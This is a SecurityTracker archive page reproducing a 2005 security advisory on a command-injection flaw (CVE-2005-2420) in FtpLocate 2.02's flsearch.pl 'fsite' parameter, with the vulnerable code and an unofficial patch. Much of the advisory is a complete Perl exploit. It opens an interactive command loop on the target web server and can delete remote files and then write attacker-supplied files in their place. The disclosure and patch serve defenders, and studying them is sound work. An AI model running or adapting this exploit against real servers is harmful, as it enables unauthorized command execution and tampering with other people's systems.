SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   FtpLocate Vendors:   NCKU Taiwan
FtpLocate Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1014570
SecurityTracker URL:  http://securitytracker.com/id/1014570
CVE Reference:   CVE-2005-2420   (Links to External Site)
Updated:  Jul 6 2008
Original Entry Date:  Jul 25 2005
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 2.02
Description:   A vulnerability was reported in FtpLocate. A remote user can execute arbitrary commands on the target system.

The 'flsearch.pl' script does not properly validate user-supplied input in the 'fsite' parameter. A remote user can supply a specially crafted parameter value to execute arbitrary commands on the target system. The commands will run with the privileges of the target web service.

The vendor was notified on July 15, 2005.

Chroot Security reported this vulnerability.

Impact:   A remote user can execute arbitrary commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  turtle.ee.ncku.edu.tw/ftplocate/readme.english.html (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Chroot Security Group Advisory 2005-07-25 -- ftplocate


Chroot Security Group Advisory  2005-07-25
        
Remote arbitrary code execution in FtpLocate 2.02 (current)
        
Summary:
FtpLocate is a ftp search engine supporting filename and description search.
A remote attack can run arbitary commands with the web server's privileges by
exploiting a unfiltered parameter in flsearch.pl.
        
Details:
FtpLocate contains a vulnerability that can allow an attacker to execute
arbitrary commands. The vulnerability is due to improper input validation of
user-supplied parameters (fsite) by the flsearch.pl script. Remote attackers can run arbitary commands with the web servers's privieges
 by adding a "|" or ";".
        
Vuln. Systems:
FtpLocate 1.5 - 2.02 
        
Vuln. Code:
        ---     
        /ftplocate-2.02/bin/flsearch.pl :
        # line 23 - 60
        $fsite=clean_str($input{'fsite'}); $fsite_raw=CGI::escape($fsite);
        ...     
        if ( $fsite eq "" ) {
        ...
        } else {
          $resultfname=$query_raw."-$fsite";
          ...
        }
        ...
        open (L, "$CACHEDIR/$resultfname");             # Game Over 1
        ---
        /ftplocate-2.02/bin/flsearch.pl:
        # line 53
        do_flsearch($client, $query, $fsite, $resultfname);
        
        /ftplocate-2.02/bin/flmodule.pl:
        if ( $fsite eq "" ) {
                ...
        } else {
                $optf="-F '$fsite'";                # for glimpse
                ...
        }
        # line 537
        open(G, "$CMD_GLIMPSE -i -Ny $optf $optw -H $FILELISTDIR -e '$q' 2>/$TMPDIR/flsearch.tmp.$$|");         # Game Over 2
        ---
        /ftplocate-2.02/bin/flmodule.pl:
        # line 584
        `$CMD_AGREP -i -e '$q' $setlist_str /dev/null>'$CACHEDIR/$resultfname'`;                # Game Over 3
        ---
        /ftplocate-2.02/bin/flmodule.pl:
        # line 589
        `$CMD_AGREP -i -e '$q' $setlist_str /dev/null>'$CACHEDIR/$resultfname'`;                # Game Over 4
        ---

Unofficial Patch:
        diff -urN flsearch.pl.orig flsearch.pl
        --- flsearch.pl.orig    2005-07-22 17:48:52.502670968 +0800
        +++ flsearch.pl 2005-07-22 17:56:00.979532584 +0800
        @@ -20,7 +20,10 @@
        $starttime=gettimeofday(); $starttimestr=timestr();
        
        $query=clean_str($input{'query'}); $query_raw=CGI::escape($query);              -$fsite=clean_str($input{'fsite'}); $fsite_raw=CGI::escape($fsite);
        +$fsite=clean_str($input{'fsite'});
        +# dangerous characters
        +$fsite =~ s/[\/\"\'\`\|\<\>\\\(\)\[\]\{\}\$\s;&]//g;
        +$fsite_raw=CGI::escape($fsite);                                                $page=$input{'page'};
        $client=ip2fqdn(client_ip());
        
        
Vendor Response:                                                                        2005.07.15      Vendor notified via email.
        2005.07.19      Vendor notified via email, again.
        2005.07.25      No response. Advisory released.

Exploit Code:
#!/usr/bin/perl
#
# FtpLocate <= 2.02 (current) remote exploit
# VERY PRIVATE VERSION
# DO NOT DISTRIBUTE
#
# newbug Tseng [at] chroot.org
#

sub my_socket
{       
        my $s=IO::Socket::INET->new(PeerAddr => $host,
                                PeerPort => 80,
                                Proto => "tcp") or die "socket: ";
}
sub ch2hex
{       
        $chr = $_[0];
        $out="";
        for($i=0;$i<length($chr);$i++)
        {
                $ch = substr($chr,$i,1);
 
                if($ch eq "\"")
                {
                        $out.="%5c%22";
                }
                
                elsif($ch eq "\$")
                {
                        $out.="%5c%24";
                }
                elsif($ch eq "\@")
                {               
                        $out.="%5c%40";
                }
                else
                {
                        $out.="%".sprintf("%2.2x",ord($ch));
                }
        }
        $out;
}
sub upload_file
{       
        print "local file: ";
        chomp($lfile = <STDIN>);
        print "remote file: ";
        chomp($rfile = <STDIN>);

        my $socket = &my_socket($host);
        print $socket "GET $cgi?query=xx\&fsite=|rm%20-f%20$rfile| $junk";
        close $socket;
        print "remove $host:$rfile done.\n";

        my @DATA = `cat $lfile`;
        $num=1;
        $total = scalar @DATA;
        foreach $DATA (@DATA)
        {       
                $DATA = &ch2hex($DATA);
                my $socket = &my_socket($host);
                print $socket "GET $cgi?query=xx\&fsite=|echo%20\"$DATA\"%20>>$rfile| $junk";
                print "Send lfile \"$lfile\" to $host:$rfile ... ($num/$total)\n";      
                sleep(1);
                close $socket;
                $num++;
        }
}       
use IO::Socket::INET; 
        
print "FtpLocate flsearch.pl remote exploit\n";
print "host: ";
chomp ($host = <STDIN>);
print "port (80): ";
chomp ($port = <STDIN>);
if($port eq "") 
{       
        $port = 80;
}               
print "version 1.0/1.1 (1.0): ";
chomp ($ver = <STDIN>);
if($ver eq "")
{       
        $ver = "1.0";
}
print "cmd/upload (cmd): ";                                                     chomp ($opt = <STDIN>);
if($opt eq "")                                                                  {       
        $opt = "cmd";
}
print "cgi path (/cgi-bin/ftplocate/flsearch.pl): ";
chomp ($cgi = <STDIN>);
if($cgi eq "")
{       
        $cgi = "/cgi-bin/ftplocate/flsearch.pl";
}
if($ver eq "1.0")
{       
        $junk = "HTTP/1.0\n\n";
}
}
else
{
        $junk = "HTTP/1.1\nHost: $host\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030624 Netscape/7.1\nAccept:
 text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\nAccept-Language:
 zh-tw,en-us;q=0.7,en;q=0.3\nAccept-Encoding: gzip,deflate\nAccept-Charset: Big5,utf-8;q=0.7,*;q=0.7\nKeep-Alive: 300\nConnection:
 keep-alive\n\n";                                        }       
if($opt eq "cmd")    
{
        while(1){
                print "h4ck3r\@[$host]:~\$ ";
                chomp ($cmd = <STDIN>);
                if($cmd ne "")
                {
                        print "Send command \"$cmd\" to $host ...\n";
                        $socket = &my_socket($host);
                        $cmd =~ s/\s/%20/g;
        
                        print $socket "GET $cgi?query=xx\&fsite=|$cmd| $junk";
                        print "done.\n";
                }
        }
}
elsif($opt eq "upload")
{       
        &upload_file($lfile);
}
print "done.\n";

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC